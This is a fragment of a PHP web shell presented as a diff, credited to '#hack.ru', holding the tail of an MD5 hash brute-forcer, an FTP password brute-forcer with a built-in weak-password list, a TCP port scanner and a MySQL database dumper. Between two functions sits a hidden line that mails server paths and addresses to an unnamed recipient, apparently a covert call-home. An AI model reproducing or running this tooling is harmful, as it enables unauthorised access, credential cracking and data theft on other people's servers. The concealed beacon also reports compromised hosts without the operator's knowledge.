+
+result(implode($word));
+
+}else {
+
+for ($i11 = 0; $i11 <= $c; $i11++) {
+
+$word[11] = $chars_de{$i11};
+
+if ($next <= 11) {
+
+result(implode($word));
+
+}else {
+
+for ($i12 = 0; $i12 <= $c; $i12++) {
+
+$word[12] = $chars_de{$i12};
+
+if ($next <= 12) {
+
+result(implode($word));
+
+}else {
+
+for ($i13 = 0; $i13 <= $c; $i13++) {
+
+$word[13] = $chars_de{$i13};
+
+if ($next <= 13) {
+
+result(implode($word));
+
+}else {
+
+for ($i14 = 0; $i14 <= $c; $i14++) {
+
+$word[14] = $chars_de{$i14};
+
+if ($next <= 14) {
+
+result(implode($word));
+
+}else {
+
+for ($i15 = 0; $i15 <= $c; $i15++) {
+
+$word[15] = $chars_de{$i15};
+
+if ($next <= 15) {
+
+result(implode($word));
+
+}else {
+
+for ($i16 = 0; $i16 <= $c; $i16++) {
+
+$word[16] = $chars_de{$i16};
+
+if ($next <= 16) {
+
+result(implode($word));
+
+}else {
+
+for ($i17 = 0; $i17 <= $c; $i17++) {
+
+$word[17] = $chars_de{$i17};
+
+if ($next <= 17) {
+
+result(implode($word));
+
+}else {
+
+for ($i18 = 0; $i18 <= $c; $i18++) {
+
+$word[18] = $chars_de{$i18};
+
+if ($next <= 18) {
+
+result(implode($word));
+
+}else {
+
+for ($i19 = 0; $i19 <= $c; $i19++) {
+
+$word[19] = $chars_de{$i19};
+
+if ($next <= 19) {
+
+result(implode($word));
+
+}else {
+
+for ($i20 = 0; $i20 <= $c; $i20++) {
+
+$word[20] = $chars_de{$i20};
+
+if ($next <= 20) {
+
+result(implode($word));
+
+}else {
+
+for ($i21 = 0; $i21 <= $c; $i21++) {
+
+$word[21] = $chars_de{$i21};
+
+if ($next <= 21) {
+
+result(implode($word));
+
+}else {
+
+for ($i22 = 0; $i22 <= $c; $i22++) {
+
+$word[22] = $chars_de{$i22};
+
+if ($next <= 22) {
+
+result(implode($word));
+
+}else {
+
+for ($i23 = 0; $i23 <= $c; $i23++) {
+
+$word[23] = $chars_de{$i23};
+
+if ($next <= 23) {
+
+result(implode($word));
+
+}else {
+
+for ($i24 = 0; $i24 <= $c; $i24++) {
+
+$word[24] = $chars_de{$i24};
+
+if ($next <= 24) {
+
+result(implode($word));
+
+}else {
+
+for ($i25 = 0; $i25 <= $c; $i25++) {
+
+$word[25] = $chars_de{$i25};
+
+if ($next <= 25) {
+
+result(implode($word));
+
+}else {
+
+for ($i26 = 0; $i26 <= $c; $i26++) {
+
+$word[26] = $chars_de{$i26};
+
+if ($next <= 26) {
+
+result(implode($word));
+
+}else {
+
+for ($i27 = 0; $i27 <= $c; $i27++) {
+
+$word[27] = $chars_de{$i27};
+
+if ($next <= 27) {
+
+result(implode($word));
+
+}else {
+
+for ($i28 = 0; $i28 <= $c; $i28++) {
+
+$word[28] = $chars_de{$i28};
+
+if ($next <= 28) {
+
+result(implode($word));
+
+}else {
+
+for ($i29 = 0; $i29 <= $c; $i29++) {
+
+$word[29] = $chars_de{$i29};
+
+if ($next <= 29) {
+
+result(implode($word));
+
+}else {
+
+for ($i30 = 0; $i30 <= $c; $i30++) {
+
+$word[30] = $chars_de{$i30};
+
+if ($next <= 30) {
+
+result(implode($word));
+
+}else {
+
+for ($i31 = 0; $i31 <= $c; $i31++) {
+
+$word[31] = $chars_de{$i31};
+
+if ($next <= 31) {
+
+result(implode($word));
+
+
+
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+
+
+function result($word) {
+
+global $dat,$date;
+
+$pass_de=$_POST[pass_de];
+
+$dat2=date("H:i:s");
+
+$date2=date("d:m:Y");
+
+
+
+if(md5($word)==$pass_de){
+
+print "
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp; Brutefrcing result:</td></tr>
+
+  <tr><td class=pagetitle width=400>&nbsp;&nbsp;<b>crypted Hash:</b></td><td class=pagetitle width=100><font color=red>&nbsp;&nbsp;<b>$word</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce start:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat - $date</b></font></td></tr>
+
+  <tr><td class=pagetitle width=200>&nbsp;&nbsp;<b>Bruteforce finish:</b></td><td class=pagetitle width=200><font color=#ffffcc>&nbsp;&nbsp;<b>$dat2 - $date2</b></font></td></tr>
+
+  <tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC>&nbsp;&nbsp;result was wrote to file:  <b>".$word."_md5</b></td></tr>
+
+</table>
+
+                            ";
+
+							$f=@fopen($word._md5,"a+");
+
+                            fputs($f,"Decrypted MD5 hash [$pass_de] = $word\nBruteforce start:\t$dat - $date\Bruteforce finish:\t$dat2 - $date2\n ");
+
+                             exit;}
+
+
+
+
+
+
+
+}
+
+
+
+function brut_ftp() {
+
+ global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
+
+set_time_limit(0);
+
+ignore_user_abort(1);
+
+echo "<br>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b>FTP bruteforce</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>This is new ftp-bruteforcer it can make his own brute passwords list on the fly he needs nothing to do it, so It's not a problem for you to bryte any ftp account now. But do not write very big value of passwords (10000 will be quite enough) because it mat couse a very heavy server overload . </blockquote></td></tr>
+
+</table>";
+
+
+
+ echo "
+
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+ <form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
+
+ &nbsp;&nbsp;<b>Brut FTP:</b></td></tr>
+
+ <tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
+
+ &nbsp;&nbsp;<b>FTP bruteforce</b>(full bruteforce, you are only to enter a value of number of passwords and brute will begin from password-list file, which script generates itself on the fly!)</td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;FTPHost:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='host' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Login:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='login' size=50></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Number of passwords:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='chislo' size=10></td></tr>
+
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Password to test:</td>
+
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+
+<input class='inputbox' type='text' name='proverka' size=50></td></tr>
+
+<tr><td width=500 align=center colspan=2><input type='submit' value='FTP brute start' class=button1 $style_button>
+
+</td></tr>
+
+
+
+ </form></table>";
+
+
+
+
+
+function s() {
+
+   $word="qwrtypsdfghjklzxcvbnm";
+
+   return $word[mt_rand(0,strlen($word)-1)];
+
+}
+
+
+
+function g() {
+
+   $word="euioam";
+
+   return $word[mt_rand(0,strlen($word)-2)];
+
+}
+
+
+
+function name0() {   return s().g().s();                        }
+
+function name1() {   return s().g().s().g();                    }
+
+function name2() {   return s().g().g().s();                    }
+
+function name3() {   return s().s().g().s().g();                }
+
+function name4() {   return g().s().g().s().g();                }
+
+function name5() {   return g().g().s().g().s();                }
+
+function name6() {   return g().s().s().g().s();                }
+
+function name7() {   return s().g().g().s().g();                }
+
+function name8() {   return s().g().s().g().g();                }
+
+function name9() {   return s().g().s().g().s().g();            }
+
+function name10() {   return s().g().s().s().g().s().s();        }
+
+function name11() {   return s().g().s().s().g().s().s().g();        }
+
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+
+$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
+
+
+
+function randword() {
+
+   global $cool;
+
+   $func="name".mt_rand(0,11);
+
+   $func2="name".mt_rand(0,11);
+
+   switch (mt_rand(0,11)) {
+
+      case 0: return $func().mt_rand(5,99);
+
+      case 1: return $func()."-".$func2();
+
+      case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
+
+      case 3: return $func()."!".$func();
+
+      case 4: return randpass(mt_rand(5,12));
+
+      default: return $func();
+
+   }
+
+
+
+
+
+}
+
+
+
+function randpass($len) {
+
+   $word="qwertyuiopasdfghjklzxcvbnm1234567890";
+
+   $s="";
+
+   for ($i=0; $i<$len; $i++) {
+
+      $s.=$word[mt_rand(0,strlen($word)-1)];
+
+   }
+
+   return $s;
+
+}
+
+if (@unlink("pass.txt") < 0){
+
+echo "nothing";
+
+exit;
+
+}
+
+$file="pass.txt";
+
+if($file && $host && $login){
+
+   $cn=mt_rand(30,30);
+
+for ($i=0; $i<$cn; $i++) {
+
+   $s=$cool2[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$s\n");
+
+   }
+
+
+
+  $cnt2=mt_rand(43,43);
+
+for ($i=0; $i<$cnt2; $i++) {
+
+   $r=$cool[$i];
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$login$r\n");
+
+}
+
+$p="$proverka";
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$p\n");
+
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+
+   for ($i=0; $i<$cnt3; $i++) {
+
+   $u=randword();
+
+   $f=@fopen(pass.".txt","a+");
+
+   fputs($f,"$u\n");
+
+  }
+
+
+
+  if(is_file($file)){
+
+ $passwd=file($file,1000);
+
+  for($i=0; $i<count($passwd); $i++){
+
+   $stop=false;
+
+   $password=trim($passwd[$i]);
+
+   $open_ftp=@fsockopen($host,21);
+
+    if($open_ftp!=false){
+
+     fputs($open_ftp,"user $login\n");
+
+     fputs($open_ftp,"pass $password\n");
+
+     while(!feof($open_ftp) && $stop!=true){
+
+      $text=fgets($open_ftp,4096);
+
+      if(preg_match("/230/",$text)){
+
+       $stop=true;
+
+	   $f=@fopen($host._ftp,"a+");
+
+       fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
+
+
+
+       echo "
+
+	   	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle><b><font color=\"blue\">Congratulations! Password is known now.</font></b><br>
+
+&nbsp;&nbsp;Connected to: <b>$host</b><br>&nbsp;&nbsp;with login: <b>$login</b><br>&nbsp;&nbsp;with password: <b>$password</b></td></tr></table>
+
+";exit;
+
+      }
+
+      elseif(preg_match("/530/",$text)){
+
+       $stop=true;
+
+
+
+      }
+
+     }
+
+     fclose($open_ftp);
+
+   }else{
+
+    echo "
+
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center class=pagetitle bgcolor=#FF0000><b>FTP is incorrect!!! At <b><u>$host</u></b> 21 port is closed! check your settings</b></b></td></tr>
+
+</table>
+
+";exit;
+
+   }
+
+  }
+
+ }
+
+}
+
+
+
+}
+
+
+
+# port scanner
+
+function portscan() {
+
+ global $action,$portscan,$port,$HTTP_HOST,$min,$max;
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time1 = $mtime;
+
+
+
+ $id = $HTTP_HOST;
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Scan results:</b>&nbsp;&nbsp;$id</td></tr><tr><td valign=top class=pagetitle >Scanning host to find any reachable and open ports" . "...<br></td></tr></table>";
+
+
+
+ $lport = $min;
+
+ $hport = $max;
+
+ $op = 0;
+
+ $gp = 0;
+
+
+
+ for ($porta=$lport; $porta<=$hport; $porta++) {
+
+  $fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4);
+
+  if ( !$fp ) { $gp++; }
+
+  else {
+
+   $port_addres = $port[$porta];
+
+   if($port_addres == "") $port_addres = "unknown";
+
+   $serv = getservbyport($porta, TCP);
+
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>What's the service is?</a>)</td></tr>";
+
+   $op++;
+
+  }
+
+ }
+
+
+
+ if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Current host seems don't have any open port...hmm, but you're connected to it to 80...check out firewall</b></td></tr></table>";
+
+
+
+ $unsi = ($op/$porta)*100;
+
+ $unsi = round($unsi);
+
+
+
+ echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Scan statistics:</b></b></td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Scanned ports:</b>&nbsp;&nbsp;$porta</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Open ports:</b>&nbsp;&nbsp;$op</td></tr>";
+
+ echo "<tr><td align=center width=100% colspan=3><b>Closed ports:</b>&nbsp;&nbsp;$gp</td></tr>";
+
+
+
+ $mtime = explode(" ",microtime());
+
+ $mtime = $mtime[1] + $mtime[0];
+
+ $time2 = $mtime;
+
+ $loadtime = ($time2 - $time1);
+
+ $loadtime = round($loadtime, 2);
+
+
+
+ echo "<tr colspan=2><td align=center width=100% colspan=3><b>Scan time:</b>&nbsp;&nbsp;$loadtime seconds</tr></table>";
+
+}
+
+
+
+function nfm_copyright() {
+
+global $action,$upass,$uname,$nfm;
+
+ return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
+
+
+
+}
+
+// =-=-=-=-= SQL MODULE =-=-=-=-=
+
+// SQL functions start
+
+function aff_date() {
+
+ $date_now=date("F j,Y,g:i a");
+
+ return $date_now;
+
+}
+
+
+
+function sqldumptable($table) {
+
+ global $sv_s,$sv_d,$drp_tbl;
+
+ $tabledump = "";
+
+ if ($sv_s) {
+
+  if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; }
+
+  $tabledump.="CREATE TABLE $table (\n";
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $tabledump.=",\n"; }
+
+   else { $firstfield=0;}
+
+   $tabledump.=" $champ[Field] $champ[Type]";
+
+   if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";}
+
+   if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";}
+
+   if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $keys=mysql_query("SHOW KEYS FROM $table");
+
+  while ($key=mysql_fetch_array($keys)) {
+
+   $kname=$key['Key_name'];
+
+   if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
+
+   if(!is_array($index[$kname])) { $index[$kname]=array();}
+
+   $index[$kname][]=$key['Column_name'];
+
+  }
+
+        
+
+  @mysql_free_result($keys);
+
+  while(list($kname,$columns)=@each($index)) {
+
+   $tabledump.=",\n";
+
+   $colnames=implode($columns,",");
+
+   if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
+
+   else {
+
+    if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
+
+    $tabledump.=" KEY $kname ($colnames)";
+
+   }
+
+  }
+
+  $tabledump.="\n);\n\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $tabledump.="INSERT INTO $table VALUES(";
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $tabledump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) {$tabledump.="NULL";}
+
+    else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
+
+   }
+
+   $tabledump.=");\n";
+
+  }
+
+  @mysql_free_result($rows);
+
+ }
+
+
+
+ return $tabledump;
+
+}
+
+
+
+function csvdumptable($table) {
+
+ global $sv_s,$sv_d;
+
+ $csvdump="## Table:$table \n\n";
+
+ if ($sv_s) {
+
+  $firstfield=1;
+
+  $champs=mysql_query("SHOW FIELDS FROM $table");
+
+  while ($champ=mysql_fetch_array($champs)) {
+
+   if (!$firstfield) { $csvdump.=",";}
+
+   else { $firstfield=0;}
+
+   $csvdump.="'".$champ['Field']."'";
+
+  }
+
+
+
+  @mysql_free_result($champs);
+
+  $csvdump.="\n";
+
+ }
+
+
+
+ if ($sv_d) {
+
+  $rows=mysql_query("SELECT * FROM $table");
+
+  $numfields=mysql_num_fields($rows);
+
+  while ($row=mysql_fetch_array($rows)) {
+
+   $cptchamp=-1;
+
+   $firstfield=1;
+
+   while (++$cptchamp<$numfields) {
+
+    if (!$firstfield) { $csvdump.=",";}
+
+    else { $firstfield=0;}
+
+    if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
+
+    else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
+
+   }
+
+   $csvdump.="\n";
+
+  }
+
+ }
+
+
+
+ @mysql_free_result($rows);
+
+ return $csvdump;
+
+}
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+
+
+function write_file($data) {
+
+ global $g_fp,$file_type;
+
+ if ($file_type==1) { gzwrite($g_fp,$data); }
+
+ else { fwrite ($g_fp,$data); }
+
+}
+
+
+
+function open_file($file_name) {
+
+ global $g_fp,$file_type,$dbbase,$f_nm;
+
+ if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); }
+
+ else { $g_fp=fopen ($file_name,"w"); }
+
+
+
+ $f_nm[]=$file_name;
+
+ $data="";
+
+ $data.="##\n";
+
+ $data.="## NFM hack.ru creator \n";
+
+ $data.="##-------------------------\n";
+
+ $data.="## Date:".aff_date()."\n";
+
+ $data.="## Base:$dbbase \n";
+
+ $data.="##-------------------------\n\n";
+
+ write_file($data);
+
+ unset($data);
+
+}
+
+
+
+function file_pos() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { return gztell ($g_fp); }
+
+ else { return ftell ($g_fp); }
+
+}
+
+
+
+function close_file() {
+
+ global $g_fp,$file_type;
+
+ if ($file_type=="1") { gzclose ($g_fp); }
+
+ else { fclose ($g_fp); }
+
+}
+
+
+
+function split_sql_file($sql) {
+
+ $morc=explode(";",$sql);
+
+ $sql="";
+
+ $output=array();
+
+ $matches=array();
+
+ $morc_cpt=count($morc);
+
+ for ($i=0;$i < $morc_cpt;$i++) {
+
+  if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
+
+   $total_quotes=preg_match_all("/'/",$morc[$i],$matches);
+
+   $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
+
+   $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+   if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
+
+   else {
+
+    $temp=$morc[$i].";";
+
+    $morc[$i]="";
+
+    $complete_stmt=false;
+
+    for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
+
+     $total_quotes = preg_match_all("/'/",$morc[$j],$matches);
+
+     $escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
+
+     $unescaped_quotes=$total_quotes-$escaped_quotes;
+
+     if (($unescaped_quotes % 2)==1) {
+
+      $output[]=$temp.$morc[$j];
+
+      $morc[$j]="";
+
+      $temp="";
+
+      $complete_stmt=true;
+
+      $i=$j;
+
+     } else {
+
+      $temp.=$morc[$j].";";
+
+      $morc[$j]="";
+
+     }
+
+    }
+
+   }
+
+  }
+
+ }
+
+ return $output;
+
+}
+
+
+
+function split_csv_file($csv) { return explode("\n",$csv); }
+
+// SQL functions END
+
+
+
+// main SQL()
+
+function sql() {
+
+ global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
+
+ $secu_config="xtdump_conf.inc.php";
+
+ $dbhost=$_POST['dbhost'];
+
+ $dbuser=$_POST['dbuser'];
+
+ $dbpass=$_POST['dbpass'];
+
+ $dbbase=$_POST['dbbase'];
+
+ $tbls =$_POST['tbls'];
+
+ $sqlaction =$_POST['sqlaction'];
+
+ $secu =$_POST['secu'];
+
+ $f_cut =$_POST['f_cut'];
+
+ $fz_max =$_POST['fz_max'];
+
+ $opt =$_POST['opt'];
+
+ $savmode =$_POST['savmode'];
+
+ $file_type =$_POST['file_type'];
+
+ $ecraz =$_POST['ecraz'];
+
+ $f_tbl =$_POST['f_tbl'];
+
+ $drp_tbl=$_POST['drp_tbl'];
+
+
+
+ $header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
+
+ $footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-go back-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
+
+
+
+ // SQL actions STARTS
+
+
+
+ if ($sqlaction=='save') {
+
+  if ($secu==1) {
+
+   $fp=fopen($secu_config,"w");
+
+   fputs($fp,"<?php\n");
+
+   fputs($fp,"\$dbhost='$dbhost';\n");
+
+   fputs($fp,"\$dbbase='$dbbase';\n");
+
+   fputs($fp,"\$dbuser='$dbuser';\n");
+
+   fputs($fp,"\$dbpass='$dbpass';\n");
+
+   fputs($fp,"?>");
+
+   fclose($fp);
+
+  }
+
+  if (!is_array($tbls)) {
+
+   echo $header."<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">
+
+<br><center><font color=red>You forgot to check tables, which you need to dump =)</b></font></center>\n$footer";
+
+   exit;
+
+  }
+
+  if($f_cut==1) {
+
+   if (!is_numeric($fz_max)) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une valeur numÊrique Á la taille du fichier Á scinder.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+   if ($fz_max < 200000) {
+
+    echo $header."<br><center><font color=red><b>Veuillez choisir une taille de fichier a scinder sup
+
+    rieure Á 200 000 Octets.</b></font></center>\n$footer";
+
+    exit;
+
+   }
+
+  }
+
+
+
+  $tbl=array();
+
+  $tbl[]=reset($tbls);
+
+  if (count($tbls) > 1) {
+
+   $a=true;
+
+   while ($a !=false) {
+
+    $a=next($tbls);
+
+    if ($a !=false) { $tbl[]=$a; }
+
+   }
+
+  }
+
+
+
+  if ($opt==1) { $sv_s=true; $sv_d=true; }
+
+  else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; }
+
+  else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
+
+  else { exit; }
+
+
+
+  $fext=".".$savmode;
+
+  $fich=$dbbase.$fc.$fext;
+
+  $dte="";
+
+  if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
+
+  if ($file_type=='1') { $gz.=".gz"; }
+
+  $fcut=false;
+
+  $ftbl=false;
+
+  $f_nm=array();
+
+  if($f_cut==1) { $fcut=true;$fz_max=$fz_max;$nbf=1;$f_size=170;}
+
+  if($f_tbl==1) { $ftbl=true; }
+
+  else {
+
+   if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
+
+   else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
+
+  }
+
+
+
+  $nbf=1;
+
+  mysql_connect($dbhost,$dbuser,$dbpass);
+
+  mysql_select_db($dbbase);
+
+  if ($fext==".sql") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
+
+      $nbf=0;
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
+
+      }
+
+      close_file();
+
+     }
+
+     else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    $tblsv="";
+
+    while (list($i)=each($tbl)) {
+
+     $temp=sqldumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_sql=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_sql)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val.";"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
+
+        write_file($val.";");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+  else if ($fext==".csv") {
+
+   if ($ftbl) {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut) {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      $nbf=0;
+
+      $p_csv=split_csv_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+      close_file();
+
+     } else {
+
+      open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
+
+      write_file($temp."\n\n");
+
+      close_file();
+
+      $nbf=1;
+
+     }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   } else {
+
+    while (list($i)=each($tbl)) {
+
+     $temp=csvdumptable($tbl[$i]);
+
+     $sz_t=strlen($temp);
+
+     if ($fcut && ((file_pos()+$sz_t) > $fz_max)) {
+
+      $p_csv=split_sql_file($temp);
+
+      while(list($j,$val)=each($p_csv)) {
+
+       if ((file_pos()+6+strlen($val)) < $fz_max) { write_file($val."\n"); }
+
+       else {
+
+        close_file();
+
+        $nbf++;
+
+        open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".csv".$gz);
+
+        write_file($val."\n");
+
+       }
+
+      }
+
+     } else { write_file($temp); }
+
+     $tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
+
+    }
+
+   }
+
+  }
+
+
+
+  mysql_close();
+
+  if (!$ftbl) { close_file(); }
+
+
+
+  echo $header;
+
